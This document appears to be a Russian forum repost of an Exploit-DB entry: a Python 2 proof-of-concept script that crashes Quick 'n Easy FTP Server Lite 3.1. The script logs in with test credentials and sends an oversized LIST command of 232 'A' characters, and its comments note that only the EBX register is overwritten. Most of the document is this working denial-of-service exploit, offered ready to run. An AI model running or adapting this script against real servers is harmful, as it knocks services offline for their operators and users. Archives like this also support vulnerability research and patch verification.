Exploit Quick 'n Easy FTP Server Lite 3.1 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12853
Проверка EDB
  1. Пройдено
Автор
B0ND
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-06-03
Код:
#!/usr/bin/python

print "\n############################################################"
print "##		 Team Hackers Garage			##"
print "##	Quick 'n Easy FTP Server Lite Version 3.1	##"
print "##		       Crash PoC			##"
print "##		 Sumit Sharma (aka b0nd)		##"
print "##		  [email protected]			##"
print "##							##"
print "##	    Special Thanks to: Double_Zero		##"
print "##	(http://www.exploit-db.com/author/DouBle_Zer0)  ##"
print "##			   &				##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "############################################################"

# Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable 
# Tested on: Windows XP SP2
# ftp> ls AAAA... 232 A's...AAA?
# Server Crash!
# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
# No SEH overwrite
# No EIP overwrite


from socket import *

host = "172.12.128.4"		# Virtual Windows XP SP2
port = 21
user = "test"			# "upload" and "download" access
password = "test"


s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "LIST "
buffer += "A" * 232
buffer += "?"
buffer += "\r\n"

s.send(buffer)
print s.recv(1024)
s.close()
print "---->>> Server Crash!!!"
 
Источник
www.exploit-db.com

Похожие темы